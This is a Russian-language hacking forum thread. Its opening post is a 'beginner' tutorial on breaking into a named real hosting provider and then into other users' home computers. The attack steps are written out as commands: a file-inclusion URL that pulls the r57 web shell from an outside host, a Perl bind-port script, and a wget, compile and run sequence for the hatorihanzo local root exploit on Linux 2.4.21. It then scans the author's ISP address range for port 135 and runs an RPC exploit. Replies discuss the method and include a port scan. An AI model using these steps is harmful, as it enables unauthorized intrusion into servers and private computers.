![]() |
Взлом сервера, и проникновение на удалённый компьютер
Сразу оговорюсь эта статья исключительно для новичков, и для тех кто с этим никогда раньше не сталкивался!
Всё скрипты и программы искользуемые в статье качаем отсюда: http://d1m0n.jino-net.ru/root.rar В этой статье я расскажу как можно получить рута на сервере с уязвимым ядром Linux 2.4.21, а так же как через этот сервер можно проникнуть на удалённый компьютер через 135 порт. Итак начнём. Действие первое: Получаем рута на сервере. Я нашёл хостинг _http://i2dhost.com с распространённой уязвимостью. Воспользуемся этой уязвимостью: Код:
i2dhost.com/hostadmin/?path=http://rst.void.ru/download/r57shell.txt?Код:
perl bind_port.plВ netcat набираем Код:
wget http://packetstormsecurity.org/0312-exploits/hatorihanzo.cКод:
gcc -o hatorihanzo hatorihanzo.c -staticКод:
./hatorihanzoКод:
uid=0|root| gid=0|root|Действие второе: Проникаем на удалённый компьютер. Сначала ище компьютеры с открытым 135 портом. Я это делал при помощи XSpider'a. Вбиваем диапазон ip адресов своего прова у меня это 82.179.80.1 - 82.179.82.255. Запускаем сканер. И он ищет все компы, и показывает их открытые порты. У меня он из 40 компов нашёл 17 с открытым 135 портом. Далее заливаем скрипт expl.c на порутаный нами сервак. Компилируем его командой Код:
gcc -o expl expl.cКод:
./explТак же оговорюсь что для выполнения второго действия права root не обязательны. Ну вот и всё. Спасибо за внимание. |
статья гм.. нормальная.. но для новичком слишком много неясного.. действия отписаны не детельно, т.е. не очень подробно.. имхо). А так молодец)
|
Респект! Вот только не на каждый сервер можно залить что либо... к примеру у меня на ни на какой сервер не заливается бин порта...
|
гм, статья ваще не ясная, лично нихрена не понял, ну нельзя было разжевать а?
|
gcc команда не работает че делать???
|
Цитата:
|
А зачем вообще порт было биндить?? Помоему и без этого можно было сплоит и скачать и запустить...
|
2dronga можно и не биндить, но на терминале удобней, да и еще я посмотрю как ты на веб шелле запустишь mc
|
Цитата:
|
Цитата:
21/tcp open ftp PureFTPd 22/tcp open ssh OpenSSH 3.6.1p2 (protocol 1.99) 23/tcp open|filtered telnet 25/tcp open smtp Exim smtpd 4.52 53/tcp open domain ISC Bind 9.2.3 80/tcp open http Apache httpd 1.3.33 110/tcp open pop3 cppop pop3d 20.0 |
| Время: 19:45 |